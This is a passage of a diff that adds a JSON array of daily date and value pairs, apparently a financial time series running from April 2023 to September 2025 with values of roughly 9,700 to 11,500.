+ [ + "2023-04-18", + 9720.298801604667 + ], + [ + "2023-04-19", + 9721.439028753677 + ], + [ + "2023-04-20", + 9722.579389655564 + ], + [ + "2023-04-21", + 9723.719884326021 + ], + [ + "2023-04-24", + 9724.860512780739 + ], + [ + "2023-04-25", + 9726.001275035409 + ], + [ + "2023-04-26", + 9727.14217110573 + ], + [ + "2023-04-27", + 9728.283201007396 + ], + [ + "2023-04-28", + 9729.424364756107 + ], + [ + "2023-05-01", + 9730.565662367564 + ], + [ + "2023-05-02", + 9731.707093857469 + ], + [ + "2023-05-03", + 9732.848659241527 + ], + [ + "2023-05-04", + 9733.990358535444 + ], + [ + "2023-05-05", + 9735.132191754928 + ], + [ + "2023-05-08", + 9736.27415891569 + ], + [ + "2023-05-09", + 9737.416260033442 + ], + [ + "2023-05-10", + 9738.558495123896 + ], + [ + "2023-05-11", + 9739.700864202769 + ], + [ + "2023-05-12", + 9740.843367285775 + ], + [ + "2023-05-15", + 9741.986004388638 + ], + [ + "2023-05-16", + 9743.128775527077 + ], + [ + "2023-05-17", + 9744.271680716813 + ], + [ + "2023-05-18", + 9745.414719973573 + ], + [ + "2023-05-19", + 9746.557893313082 + ], + [ + "2023-05-22", + 9747.70120075107 + ], + [ + "2023-05-23", + 9748.844642303266 + ], + [ + "2023-05-24", + 9749.988217985403 + ], + [ + "2023-05-25", + 9751.131927813214 + ], + [ + "2023-05-26", + 9752.275771802437 + ], + [ + "2023-05-30", + 9753.419749968807 + ], + [ + "2023-05-31", + 9754.563862328065 + ], + [ + "2023-06-01", + 9755.708108895951 + ], + [ + "2023-06-02", + 9756.85248968821 + ], + [ + "2023-06-05", + 9757.997004720586 + ], + [ + "2023-06-06", + 9759.141654008825 + ], + [ + "2023-06-07", + 9760.286437568677 + ], + [ + "2023-06-08", + 9761.43135541589 + ], + [ + "2023-06-09", + 9762.576407566221 + ], + [ + "2023-06-12", + 9763.721594035422 + ], + [ + "2023-06-13", + 9764.866914839247 + ], + [ + "2023-06-14", + 9766.012369993457 + ], + [ + "2023-06-15", + 9767.15795951381 + ], + [ + "2023-06-16", + 9768.303683416068 + ], + [ + "2023-06-20", + 9769.449541715996 + ], + [ + "2023-06-21", + 9770.595534429358 + ], + [ + "2023-06-22", + 9771.741661571921 + ], + [ + "2023-06-23", + 9772.887923159455 + ], + [ + "2023-06-26", + 9774.034319207729 + ], + [ + "2023-06-27", + 9775.180849732516 + ], + [ + "2023-06-28", + 9776.327514749593 + ], + [ + "2023-06-29", + 9777.474314274736 + ], + [ + "2023-06-30", + 9778.621248323721 + ], + [ + "2023-07-03", + 9779.76831691233 + ], + [ + "2023-07-05", + 9780.915520056344 + ], + [ + "2023-07-06", + 9782.062857771547 + ], + [ + "2023-07-07", + 9783.210330073725 + ], + [ + "2023-07-10", + 9784.357936978666 + ], + [ + "2023-07-11", + 9785.505678502159 + ], + [ + "2023-07-12", + 9786.653554659995 + ], + [ + "2023-07-13", + 9787.801565467968 + ], + [ + "2023-07-14", + 9788.949710941872 + ], + [ + "2023-07-17", + 9790.097991097504 + ], + [ + "2023-07-18", + 9791.246405950662 + ], + [ + "2023-07-19", + 9792.394955517148 + ], + [ + "2023-07-20", + 9793.543639812764 + ], + [ + "2023-07-21", + 9794.692458853313 + ], + [ + "2023-07-24", + 9795.841412654603 + ], + [ + "2023-07-25", + 9796.990501232442 + ], + [ + "2023-07-26", + 9798.139724602637 + ], + [ + "2023-07-27", + 9799.289082781002 + ], + [ + "2023-07-28", + 9800.43857578335 + ], + [ + "2023-07-31", + 9801.588203625495 + ], + [ + "2023-08-01", + 9802.737966323257 + ], + [ + "2023-08-02", + 9803.887863892453 + ], + [ + "2023-08-03", + 9805.037896348904 + ], + [ + "2023-08-04", + 9806.188063708432 + ], + [ + "2023-08-07", + 9807.338365986865 + ], + [ + "2023-08-08", + 9808.488803200027 + ], + [ + "2023-08-09", + 9809.639375363746 + ], + [ + "2023-08-10", + 9810.790082493853 + ], + [ + "2023-08-11", + 9811.94092460618 + ], + [ + "2023-08-14", + 9813.091901716562 + ], + [ + "2023-08-15", + 9814.24301384083 + ], + [ + "2023-08-16", + 9815.394260994828 + ], + [ + "2023-08-17", + 9816.545643194391 + ], + [ + "2023-08-18", + 9817.697160455364 + ], + [ + "2023-08-21", + 9818.848812793587 + ], + [ + "2023-08-22", + 9820.000600224907 + ], + [ + "2023-08-23", + 9821.15252276517 + ], + [ + "2023-08-24", + 9822.304580430224 + ], + [ + "2023-08-25", + 9823.456773235921 + ], + [ + "2023-08-28", + 9824.609101198113 + ], + [ + "2023-08-29", + 9825.761564332655 + ], + [ + "2023-08-30", + 9826.914162655403 + ], + [ + "2023-08-31", + 9828.066896182214 + ], + [ + "2023-09-01", + 9829.21976492895 + ], + [ + "2023-09-05", + 9830.372768911471 + ], + [ + "2023-09-06", + 9831.525908145642 + ], + [ + "2023-09-07", + 9832.679182647327 + ], + [ + "2023-09-08", + 9833.832592432394 + ], + [ + "2023-09-11", + 9834.986137516713 + ], + [ + "2023-09-12", + 9836.139817916153 + ], + [ + "2023-09-13", + 9837.29363364659 + ], + [ + "2023-09-14", + 9838.447584723897 + ], + [ + "2023-09-15", + 9839.601671163951 + ], + [ + "2023-09-18", + 9840.75589298263 + ], + [ + "2023-09-19", + 9841.910250195815 + ], + [ + "2023-09-20", + 9843.064742819388 + ], + [ + "2023-09-21", + 9844.219370869234 + ], + [ + "2023-09-22", + 9845.374134361238 + ], + [ + "2023-09-25", + 9846.529033311288 + ], + [ + "2023-09-26", + 9847.684067735274 + ], + [ + "2023-09-27", + 9848.839237649088 + ], + [ + "2023-09-28", + 9849.994543068624 + ], + [ + "2023-09-29", + 9851.149984009775 + ], + [ + "2023-10-02", + 9852.30556048844 + ], + [ + "2023-10-03", + 9853.461272520517 + ], + [ + "2023-10-04", + 9854.617120121908 + ], + [ + "2023-10-05", + 9855.773103308515 + ], + [ + "2023-10-06", + 9856.929222096242 + ], + [ + "2023-10-09", + 9858.085476500997 + ], + [ + "2023-10-10", + 9859.241866538689 + ], + [ + "2023-10-11", + 9860.398392225226 + ], + [ + "2023-10-12", + 9861.555053576521 + ], + [ + "2023-10-13", + 9862.711850608488 + ], + [ + "2023-10-16", + 9863.868783337044 + ], + [ + "2023-10-17", + 9865.025851778106 + ], + [ + "2023-10-18", + 9866.183055947593 + ], + [ + "2023-10-19", + 9867.340395861425 + ], + [ + "2023-10-20", + 9868.497871535528 + ], + [ + "2023-10-23", + 9869.655482985827 + ], + [ + "2023-10-24", + 9870.813230228248 + ], + [ + "2023-10-25", + 9871.97111327872 + ], + [ + "2023-10-26", + 9873.129132153173 + ], + [ + "2023-10-27", + 9874.287286867542 + ], + [ + "2023-10-30", + 9872.45557743776 + ], + [ + "2023-10-31", + 9882.789072446543 + ], + [ + "2023-11-01", + 9890.399802637576 + ], + [ + "2023-11-02", + 9891.559983265732 + ], + [ + "2023-11-03", + 9892.720299987384 + ], + [ + "2023-11-06", + 9890.8907528185 + ], + [ + "2023-11-07", + 9901.882123805924 + ], + [ + "2023-11-08", + 9903.043651352998 + ], + [ + "2023-11-09", + 9904.205315151567 + ], + [ + "2023-11-10", + 9905.367115217612 + ], + [ + "2023-11-13", + 9903.539051567119 + ], + [ + "2023-11-14", + 9922.438263089743 + ], + [ + "2023-11-15", + 9923.602201948297 + ], + [ + "2023-11-16", + 9924.766277341201 + ], + [ + "2023-11-17", + 9925.930489284472 + ], + [ + "2023-11-20", + 9927.094837794128 + ], + [ + "2023-11-21", + 9928.259322886188 + ], + [ + "2023-11-22", + 9929.423944576674 + ], + [ + "2023-11-24", + 9930.58870288161 + ], + [ + "2023-11-27", + 9931.753597817022 + ], + [ + "2023-11-28", + 9932.918629398935 + ], + [ + "2023-11-29", + 9934.08379764338 + ], + [ + "2023-11-30", + 9935.249102566386 + ], + [ + "2023-12-01", + 9936.414544183986 + ], + [ + "2023-12-04", + 9937.580122512218 + ], + [ + "2023-12-05", + 9938.745837567116 + ], + [ + "2023-12-06", + 9939.911689364719 + ], + [ + "2023-12-07", + 9941.077677921068 + ], + [ + "2023-12-08", + 9942.243803252206 + ], + [ + "2023-12-11", + 9943.410065374175 + ], + [ + "2023-12-12", + 9944.576464303023 + ], + [ + "2023-12-13", + 9945.743000054797 + ], + [ + "2023-12-14", + 9946.909672645546 + ], + [ + "2023-12-15", + 9948.076482091323 + ], + [ + "2023-12-18", + 9949.243428408181 + ], + [ + "2023-12-19", + 9950.410511612175 + ], + [ + "2023-12-20", + 9951.577731719364 + ], + [ + "2023-12-21", + 9952.745088745807 + ], + [ + "2023-12-22", + 9953.912582707564 + ], + [ + "2023-12-26", + 9955.080213620698 + ], + [ + "2023-12-27", + 9956.247981501276 + ], + [ + "2023-12-28", + 9957.415886365363 + ], + [ + "2023-12-29", + 9958.583928229027 + ], + [ + "2024-01-02", + 9956.762107108341 + ], + [ + "2024-01-03", + 9944.058718566954 + ], + [ + "2024-01-04", + 9935.535003289051 + ], + [ + "2024-01-05", + 9945.552156122076 + ], + [ + "2024-01-08", + 9971.084263118939 + ], + [ + "2024-01-09", + 9969.26390833396 + ], + [ + "2024-01-10", + 9976.394604291288 + ], + [ + "2024-01-11", + 9977.56487242905 + ], + [ + "2024-01-12", + 9978.735277843609 + ], + [ + "2024-01-16", + 9976.91582055107 + ], + [ + "2024-01-17", + 9972.841338521308 + ], + [ + "2024-01-18", + 9985.744276840509 + ], + [ + "2024-01-19", + 9986.915641729584 + ], + [ + "2024-01-22", + 9988.08714402411 + ], + [ + "2024-01-23", + 9989.258783740206 + ], + [ + "2024-01-24", + 9990.430560893992 + ], + [ + "2024-01-25", + 9991.60247550159 + ], + [ + "2024-01-26", + 9992.774527579124 + ], + [ + "2024-01-29", + 9993.946717142719 + ], + [ + "2024-01-30", + 9995.119044208503 + ], + [ + "2024-01-31", + 9993.301508792605 + ], + [ + "2024-02-01", + 10006.077186237764 + ], + [ + "2024-02-02", + 10007.250936252623 + ], + [ + "2024-02-05", + 10008.424823952719 + ], + [ + "2024-02-06", + 10009.5988493542 + ], + [ + "2024-02-07", + 10010.773012473222 + ], + [ + "2024-02-08", + 10011.94731332594 + ], + [ + "2024-02-09", + 10013.121751928507 + ], + [ + "2024-02-12", + 10014.296328297085 + ], + [ + "2024-02-13", + 10012.481042447833 + ], + [ + "2024-02-14", + 10026.850995308392 + ], + [ + "2024-02-15", + 10028.027182168207 + ], + [ + "2024-02-16", + 10029.203506999109 + ], + [ + "2024-02-20", + 10027.38996981728 + ], + [ + "2024-02-21", + 10025.63295502131 + ], + [ + "2024-02-22", + 10044.868603989917 + ], + [ + "2024-02-23", + 10046.046904382143 + ], + [ + "2024-02-26", + 10047.225342993383 + ], + [ + "2024-02-27", + 10045.413919839848 + ], + [ + "2024-02-28", + 10041.094430308885 + ], + [ + "2024-02-29", + 10063.99921395033 + ], + [ + "2024-03-01", + 10065.179758434153 + ], + [ + "2024-03-04", + 10066.36044140023 + ], + [ + "2024-03-05", + 10064.551262864801 + ], + [ + "2024-03-06", + 10079.217628618519 + ], + [ + "2024-03-07", + 10090.124240084742 + ], + [ + "2024-03-08", + 10091.307849131155 + ], + [ + "2024-03-11", + 10092.491597019305 + ], + [ + "2024-03-12", + 10090.685483765477 + ], + [ + "2024-03-13", + 10082.945781683184 + ], + [ + "2024-03-14", + 10085.13075191976 + ], + [ + "2024-03-15", + 10047.627372581455 + ], + [ + "2024-03-18", + 10115.57476658314 + ], + [ + "2024-03-19", + 10113.77136107083 + ], + [ + "2024-03-20", + 10132.536550908457 + ], + [ + "2024-03-21", + 10133.725135076442 + ], + [ + "2024-03-22", + 10134.913858669765 + ], + [ + "2024-03-25", + 10136.10272170478 + ], + [ + "2024-03-26", + 10134.301724197843 + ], + [ + "2024-03-27", + 10144.446854799196 + ], + [ + "2024-03-28", + 10147.456674650512 + ], + [ + "2024-04-01", + 10159.100556351439 + ], + [ + "2024-04-02", + 10157.302256575917 + ], + [ + "2024-04-03", + 10166.174527307387 + ], + [ + "2024-04-04", + 10167.367057334928 + ], + [ + "2024-04-05", + 10168.559727250671 + ], + [ + "2024-04-08", + 10169.752537071025 + ], + [ + "2024-04-09", + 10167.9554868124 + ], + [ + "2024-04-10", + 10160.549276045442 + ], + [ + "2024-04-11", + 10176.78748168735 + ], + [ + "2024-04-12", + 10177.981256653857 + ], + [ + "2024-04-15", + 10179.1751716546 + ], + [ + "2024-04-16", + 10177.379226706007 + ], + [ + "2024-04-17", + 10155.609934683655 + ], + [ + "2024-04-18", + 10147.393533304905 + ], + [ + "2024-04-19", + 10044.55961380413 + ], + [ + "2024-04-22", + 10120.105979346015 + ], + [ + "2024-04-23", + 10194.915105496624 + ], + [ + "2024-04-24", + 10204.677929983662 + ], + [ + "2024-04-25", + 10202.973909091474 + ], + [ + "2024-04-26", + 10217.099343993992 + ], + [ + "2024-04-29", + 10218.297847691658 + ], + [ + "2024-04-30", + 10216.506491978258 + ], + [ + "2024-05-01", + 10208.435369683493 + ], + [ + "2024-05-02", + 10233.071788213123 + ], + [ + "2024-05-03", + 10234.272165537815 + ], + [ + "2024-05-06", + 10235.472683671225 + ], + [ + "2024-05-07", + 10233.68334262987 + ], + [ + "2024-05-08", + 10240.969863496539 + ], + [ + "2024-05-09", + 10254.767687160702 + ], + [ + "2024-05-10", + 10264.134159185207 + ], + [ + "2024-05-13", + 10265.338180241375 + ], + [ + "2024-05-14", + 10263.552342533685 + ], + [ + "2024-05-15", + 10285.186147489147 + ], + [ + "2024-05-16", + 10286.392638021725 + ], + [ + "2024-05-17", + 10287.599270080125 + ], + [ + "2024-05-20", + 10288.806043680946 + ], + [ + "2024-05-21", + 10290.012958840793 + ], + [ + "2024-05-22", + 10291.22001557627 + ], + [ + "2024-05-23", + 10292.427213903984 + ], + [ + "2024-05-24", + 10293.634553840546 + ], + [ + "2024-05-28", + 10294.842035402566 + ], + [ + "2024-05-29", + 10296.049658606657 + ], + [ + "2024-05-30", + 10294.267423469435 + ], + [ + "2024-05-31", + 10298.804070241644 + ], + [ + "2024-06-03", + 10305.220909637386 + ], + [ + "2024-06-04", + 10306.429750321971 + ], + [ + "2024-06-05", + 10307.638732808058 + ], + [ + "2024-06-06", + 10308.84785711228 + ], + [ + "2024-06-07", + 10310.057123251274 + ], + [ + "2024-06-10", + 10311.266531241676 + ], + [ + "2024-06-11", + 10312.476081100127 + ], + [ + "2024-06-12", + 10313.68577284327 + ], + [ + "2024-06-13", + 10314.895606487746 + ], + [ + "2024-06-14", + 10316.1055820502 + ], + [ + "2024-06-17", + 10317.315699547284 + ], + [ + "2024-06-18", + 10318.525958995642 + ], + [ + "2024-06-20", + 10319.73636041193 + ], + [ + "2024-06-21", + 10320.946903812797 + ], + [ + "2024-06-24", + 10319.167589214903 + ], + [ + "2024-06-25", + 10330.013146463485 + ], + [ + "2024-06-26", + 10331.224895369523 + ], + [ + "2024-06-27", + 10332.43678641821 + ], + [ + "2024-06-28", + 10333.648819626216 + ], + [ + "2024-07-01", + 10334.86099501022 + ], + [ + "2024-07-02", + 10336.073312586897 + ], + [ + "2024-07-03", + 10337.285772372928 + ], + [ + "2024-07-05", + 10338.498374384995 + ], + [ + "2024-07-08", + 10339.711118639781 + ], + [ + "2024-07-09", + 10340.924005153973 + ], + [ + "2024-07-10", + 10342.137033944256 + ], + [ + "2024-07-11", + 10340.360205027324 + ], + [ + "2024-07-12", + 10352.744904692265 + ], + [ + "2024-07-15", + 10353.959320117965 + ], + [ + "2024-07-16", + 10355.173877999106 + ], + [ + "2024-07-17", + 10356.388578352397 + ], + [ + "2024-07-18", + 10354.613421194548 + ], + [ + "2024-07-19", + 10337.328877851514 + ], + [ + "2024-07-22", + 10382.380290466503 + ], + [ + "2024-07-23", + 10383.598182233016 + ], + [ + "2024-07-24", + 10384.816216862757 + ], + [ + "2024-07-25", + 10383.044394372484 + ], + [ + "2024-07-26", + 10407.9291818479 + ], + [ + "2024-07-29", + 10426.08334647343 + ], + [ + "2024-07-30", + 10427.306364770719 + ], + [ + "2024-07-31", + 10428.529526532595 + ], + [ + "2024-08-01", + 10426.76283177589 + ], + [ + "2024-08-02", + 10345.621072481325 + ], + [ + "2024-08-05", + 10196.201031854178 + ], + [ + "2024-08-06", + 10262.854216029464 + ], + [ + "2024-08-07", + 10188.72169359499 + ], + [ + "2024-08-08", + 10426.68565040518 + ], + [ + "2024-08-09", + 10459.606081626209 + ], + [ + "2024-08-12", + 10514.306828280392 + ], + [ + "2024-08-13", + 10596.555730745442 + ], + [ + "2024-08-14", + 10615.46602168552 + ], + [ + "2024-08-15", + 10620.007757498955 + ], + [ + "2024-08-16", + 10637.55991621286 + ], + [ + "2024-08-19", + 10703.618546266862 + ], + [ + "2024-08-20", + 10704.874120473805 + ], + [ + "2024-08-21", + 10706.129841964268 + ], + [ + "2024-08-22", + 10704.395710755525 + ], + [ + "2024-08-23", + 10742.697307430533 + ], + [ + "2024-08-26", + 10754.161438988198 + ], + [ + "2024-08-27", + 10755.422942064166 + ], + [ + "2024-08-28", + 10756.684593119131 + ], + [ + "2024-08-29", + 10754.95639217045 + ], + [ + "2024-08-30", + 10793.17624779035 + ], + [ + "2024-09-03", + 10794.442327448285 + ], + [ + "2024-09-04", + 10795.708555622066 + ], + [ + "2024-09-05", + 10793.984932329115 + ], + [ + "2024-09-06", + 10704.377477021104 + ], + [ + "2024-09-09", + 10788.70878385405 + ], + [ + "2024-09-10", + 10825.509043160057 + ], + [ + "2024-09-11", + 10826.778915574967 + ], + [ + "2024-09-12", + 10825.058936950629 + ], + [ + "2024-09-13", + 10852.285019017878 + ], + [ + "2024-09-16", + 10866.190135076173 + ], + [ + "2024-09-17", + 10867.464779534248 + ], + [ + "2024-09-18", + 10868.739573512852 + ], + [ + "2024-09-19", + 10867.024517029526 + ], + [ + "2024-09-20", + 10875.365519433119 + ], + [ + "2024-09-23", + 10908.901198800173 + ], + [ + "2024-09-24", + 10910.180853424645 + ], + [ + "2024-09-25", + 10911.460658157357 + ], + [ + "2024-09-26", + 10909.750613015916 + ], + [ + "2024-09-27", + 10902.047876747336 + ], + [ + "2024-09-30", + 10939.1508228328 + ], + [ + "2024-10-01", + 10940.434025850514 + ], + [ + "2024-10-02", + 10941.717379392707 + ], + [ + "2024-10-03", + 10940.010883477036 + ], + [ + "2024-10-04", + 10970.865778516623 + ], + [ + "2024-10-07", + 10972.152701816423 + ], + [ + "2024-10-08", + 10973.439776077104 + ], + [ + "2024-10-09", + 10974.727001316376 + ], + [ + "2024-10-10", + 10973.02437755195 + ], + [ + "2024-10-11", + 10980.064890510483 + ], + [ + "2024-10-14", + 10993.703185994089 + ], + [ + "2024-10-15", + 10994.9927882066 + ], + [ + "2024-10-16", + 10996.28254169424 + ], + [ + "2024-10-17", + 10997.572446474753 + ], + [ + "2024-10-18", + 10998.862502565888 + ], + [ + "2024-10-21", + 11000.152709985394 + ], + [ + "2024-10-22", + 11001.443068751021 + ], + [ + "2024-10-23", + 10999.743578880523 + ], + [ + "2024-10-24", + 11010.331335651672 + ], + [ + "2024-10-25", + 11011.622888407892 + ], + [ + "2024-10-28", + 11012.914592668047 + ], + [ + "2024-10-29", + 11014.206448449908 + ], + [ + "2024-10-30", + 11015.49845577125 + ], + [ + "2024-10-31", + 11013.80061464985 + ], + [ + "2024-11-01", + 11028.914119114635 + ], + [ + "2024-11-04", + 11030.207851700368 + ], + [ + "2024-11-05", + 11031.501736045739 + ], + [ + "2024-11-06", + 11032.795772168549 + ], + [ + "2024-11-07", + 11034.089960086601 + ], + [ + "2024-11-08", + 11035.384299817702 + ], + [ + "2024-11-11", + 11036.678791379662 + ], + [ + "2024-11-12", + 11037.973434790289 + ], + [ + "2024-11-13", + 11039.268230067395 + ], + [ + "2024-11-14", + 11037.573177228796 + ], + [ + "2024-11-15", + 10928.579367035982 + ], + [ + "2024-11-18", + 11003.30938060324 + ], + [ + "2024-11-19", + 11047.919967366963 + ], + [ + "2024-11-20", + 11065.555823591789 + ], + [ + "2024-11-21", + 11063.86385438554 + ], + [ + "2024-11-22", + 11076.198746849195 + ], + [ + "2024-11-25", + 11100.099204441378 + ], + [ + "2024-11-26", + 11101.40128730199 + ], + [ + "2024-11-27", + 11102.703522901757 + ], + [ + "2024-11-29", + 11101.015911258595 + ], + [ + "2024-12-02", + 11128.877040838495 + ], + [ + "2024-12-03", + 11130.182499446193 + ], + [ + "2024-12-04", + 11131.488111189034 + ], + [ + "2024-12-05", + 11132.79387608498 + ], + [ + "2024-12-06", + 11134.099794151998 + ], + [ + "2024-12-09", + 11135.405865408056 + ], + [ + "2024-12-10", + 11136.712089871122 + ], + [ + "2024-12-11", + 11138.018467559168 + ], + [ + "2024-12-12", + 11136.33499849017 + ], + [ + "2024-12-13", + 11152.748539797905 + ], + [ + "2024-12-16", + 11154.056798621084 + ], + [ + "2024-12-17", + 11155.365210907883 + ], + [ + "2024-12-18", + 11156.673776676302 + ], + [ + "2024-12-19", + 11154.992495944345 + ], + [ + "2024-12-20", + 11177.63718745119 + ], + [ + "2024-12-23", + 11178.948365805172 + ], + [ + "2024-12-24", + 11180.259697965244 + ], + [ + "2024-12-26", + 11178.581183949449 + ], + [ + "2024-12-27", + 11132.298673486239 + ], + [ + "2024-12-30", + 11089.389608836384 + ], + [ + "2024-12-31", + 11031.219331571136 + ], + [ + "2025-01-02", + 11024.167054455873 + ], + [ + "2025-01-03", + 11120.176015311705 + ], + [ + "2025-01-06", + 11193.278605174655 + ], + [ + "2025-01-07", + 11142.39871361811 + ], + [ + "2025-01-08", + 11170.555420255616 + ], + [ + "2025-01-10", + 11048.720081269765 + ], + [ + "2025-01-13", + 11070.479090659319 + ], + [ + "2025-01-14", + 11076.69863830439 + ], + [ + "2025-01-15", + 11213.197373100478 + ], + [ + "2025-01-16", + 11213.470726485486 + ], + [ + "2025-01-17", + 11253.515096409366 + ], + [ + "2025-01-21", + 11317.631306611998 + ], + [ + "2025-01-22", + 11318.958906796073 + ], + [ + "2025-01-23", + 11320.28666271258 + ], + [ + "2025-01-24", + 11318.624574379788 + ], + [ + "2025-01-27", + 11185.940630120815 + ], + [ + "2025-01-28", + 11290.556034601159 + ], + [ + "2025-01-29", + 11303.080155329366 + ], + [ + "2025-01-30", + 11348.92998435336 + ], + [ + "2025-01-31", + 11372.80968007193 + ], + [ + "2025-02-03", + 11377.910488287065 + ], + [ + "2025-02-04", + 11417.65464972541 + ], + [ + "2025-02-05", + 11418.993983019102 + ], + [ + "2025-02-06", + 11420.333473421562 + ], + [ + "2025-02-07", + 11418.683120951222 + ], + [ + "2025-02-10", + 11462.554863693265 + ], + [ + "2025-02-11", + 11463.899463948808 + ], + [ + "2025-02-12", + 11465.244221930954 + ], + [ + "2025-02-13", + 11466.589137658206 + ], + [ + "2025-02-14", + 11464.944211149064 + ], + [ + "2025-02-18", + 11500.229529931072 + ], + [ + "2025-02-19", + 11501.578549564882 + ], + [ + "2025-02-20", + 11502.927727443704 + ], + [ + "2025-02-21", + 11501.287063586102 + ], + [ + "2025-02-24", + 11488.026103748387 + ], + [ + "2025-02-25", + 11446.143141213033 + ], + [ + "2025-02-26", + 11478.951340351588 + ], + [ + "2025-02-27", + 11202.990834560982 + ], + [ + "2025-02-28", + 11363.459277375858 + ], + [ + "2025-03-03", + 11202.099310104215 + ], + [ + "2025-03-04", + 11190.418246819796 + ], + [ + "2025-03-05", + 11272.964452111595 + ], + [ + "2025-03-06", + 11083.420739680349 + ], + [ + "2025-03-07", + 11148.614656609165 + ], + [ + "2025-03-10", + 10791.559047649367 + ], + [ + "2025-03-11", + 10786.992041359097 + ], + [ + "2025-03-12", + 10848.60035085046 + ], + [ + "2025-03-13", + 10762.596584300147 + ], + [ + "2025-03-14", + 10888.121361810738 + ], + [ + "2025-03-17", + 10964.38926620288 + ], + [ + "2025-03-18", + 10918.797368028003 + ], + [ + "2025-03-19", + 10970.903558164688 + ], + [ + "2025-03-20", + 10974.591796846065 + ], + [ + "2025-03-21", + 10999.84519613177 + ], + [ + "2025-03-24", + 11039.162590167283 + ], + [ + "2025-03-25", + 11067.139601233206 + ], + [ + "2025-03-26", + 11020.042240058103 + ], + [ + "2025-03-27", + 11019.795733779949 + ], + [ + "2025-03-28", + 10877.458899839254 + ], + [ + "2025-03-31", + 10898.404949654385 + ], + [ + "2025-04-01", + 10941.785577707176 + ], + [ + "2025-04-02", + 10984.147040137948 + ], + [ + "2025-04-03", + 10654.90870558612 + ], + [ + "2025-04-04", + 10304.06620451437 + ], + [ + "2025-04-07", + 10349.2732050761 + ], + [ + "2025-04-08", + 10289.235642247722 + ], + [ + "2025-04-09", + 10464.518092269387 + ], + [ + "2025-04-10", + 10451.839130344808 + ], + [ + "2025-04-11", + 10471.88705126682 + ], + [ + "2025-04-14", + 10549.18240049689 + ], + [ + "2025-04-15", + 10574.488897141919 + ], + [ + "2025-04-16", + 10575.729323961454 + ], + [ + "2025-04-17", + 10576.969896287663 + ], + [ + "2025-04-21", + 10575.220614137612 + ], + [ + "2025-04-22", + 10639.792830447203 + ], + [ + "2025-04-23", + 10682.692839385412 + ], + [ + "2025-04-24", + 10683.945958929226 + ], + [ + "2025-04-25", + 10685.199225468614 + ], + [ + "2025-04-28", + 10683.462639020823 + ], + [ + "2025-04-29", + 10723.297785521041 + ], + [ + "2025-04-30", + 10747.275235055778 + ], + [ + "2025-05-01", + 10796.504296125131 + ], + [ + "2025-05-02", + 10797.770766175496 + ], + [ + "2025-05-05", + 10796.047384787502 + ], + [ + "2025-05-06", + 10784.276664875426 + ], + [ + "2025-05-07", + 10823.18469489493 + ], + [ + "2025-05-08", + 10947.679801473563 + ], + [ + "2025-05-09", + 10948.964004972146 + ], + [ + "2025-05-12", + 10950.24835911257 + ], + [ + "2025-05-13", + 10951.532863912502 + ], + [ + "2025-05-14", + 10952.817519389619 + ], + [ + "2025-05-15", + 10954.102325561595 + ], + [ + "2025-05-16", + 10955.387282446105 + ], + [ + "2025-05-19", + 10956.67239006083 + ], + [ + "2025-05-20", + 10957.957648423451 + ], + [ + "2025-05-21", + 10956.253057551652 + ], + [ + "2025-05-22", + 10976.039365223585 + ], + [ + "2025-05-23", + 10959.07737145909 + ], + [ + "2025-05-27", + 11004.584922659995 + ], + [ + "2025-05-28", + 11002.88580134063 + ], + [ + "2025-05-29", + 11015.541499565494 + ], + [ + "2025-05-30", + 11020.9323461052 + ], + [ + "2025-06-02", + 11050.468467226436 + ], + [ + "2025-06-03", + 11051.764728217251 + ], + [ + "2025-06-04", + 11053.061141264296 + ], + [ + "2025-06-05", + 11054.357706385405 + ], + [ + "2025-06-06", + 11055.654423598418 + ], + [ + "2025-06-09", + 11056.951292921176 + ], + [ + "2025-06-10", + 11058.248314371522 + ], + [ + "2025-06-11", + 11059.545487967302 + ], + [ + "2025-06-12", + 11060.842813726362 + ], + [ + "2025-06-13", + 11062.14029166655 + ], + [ + "2025-06-16", + 11063.43792180572 + ], + [ + "2025-06-17", + 11064.735704161725 + ], + [ + "2025-06-18", + 11066.03363875242 + ], + [ + "2025-06-20", + 11067.331725595663 + ], + [ + "2025-06-23", + 11068.629964709313 + ], + [ + "2025-06-24", + 11069.928356111233 + ], + [ + "2025-06-25", + 11071.226899819287 + ], + [ + "2025-06-26", + 11072.525595851339 + ], + [ + "2025-06-27", + 11073.82444422526 + ], + [ + "2025-06-30", + 11075.123444958917 + ], + [ + "2025-07-01", + 11076.422598070187 + ], + [ + "2025-07-02", + 11077.72190357694 + ], + [ + "2025-07-03", + 11079.021361497054 + ], + [ + "2025-07-07", + 11080.320971848409 + ], + [ + "2025-07-08", + 11081.620734648885 + ], + [ + "2025-07-09", + 11082.920649916363 + ], + [ + "2025-07-10", + 11084.22071766873 + ], + [ + "2025-07-11", + 11085.520937923873 + ], + [ + "2025-07-14", + 11086.82131069968 + ], + [ + "2025-07-15", + 11088.121836014045 + ], + [ + "2025-07-16", + 11089.422513884858 + ], + [ + "2025-07-17", + 11090.723344330016 + ], + [ + "2025-07-18", + 11092.024327367417 + ], + [ + "2025-07-21", + 11093.325463014959 + ], + [ + "2025-07-22", + 11094.626751290545 + ], + [ + "2025-07-23", + 11095.928192212079 + ], + [ + "2025-07-24", + 11097.229785797466 + ], + [ + "2025-07-25", + 11098.531532064615 + ], + [ + "2025-07-28", + 11099.833431031435 + ], + [ + "2025-07-29", + 11101.13548271584 + ], + [ + "2025-07-30", + 11102.437687135742 + ], + [ + "2025-07-31", + 11103.74004430906 + ], + [ + "2025-08-01", + 11105.042554253709 + ], + [ + "2025-08-04", + 11106.345216987613 + ], + [ + "2025-08-05", + 11107.648032528692 + ], + [ + "2025-08-06", + 11108.951000894873 + ], + [ + "2025-08-07", + 11110.254122104083 + ], + [ + "2025-08-08", + 11111.55739617425 + ], + [ + "2025-08-11", + 11112.860823123307 + ], + [ + "2025-08-12", + 11114.164402969183 + ], + [ + "2025-08-13", + 11115.468135729818 + ], + [ + "2025-08-14", + 11116.772021423147 + ], + [ + "2025-08-15", + 11118.076060067111 + ], + [ + "2025-08-18", + 11119.380251679651 + ], + [ + "2025-08-19", + 11120.68459627871 + ], + [ + "2025-08-20", + 11121.989093882235 + ], + [ + "2025-08-21", + 11123.293744508173 + ], + [ + "2025-08-22", + 11124.598548174476 + ], + [ + "2025-08-25", + 11125.903504899094 + ], + [ + "2025-08-26", + 11127.208614699983 + ], + [ + "2025-08-27", + 11128.513877595098 + ], + [ + "2025-08-28", + 11129.819293602399 + ], + [ + "2025-08-29", + 11131.124862739845 + ], + [ + "2025-09-02", + 11132.4305850254 + ], + [ + "2025-09-03", + 11133.736460477028 + ], + [ + "2025-09-04", + 11135.042489112697 + ], + [ + "2025-09-05", + 11136.348670950374 + ], + [ + "2025-09-08", + 11137.655006008032 + 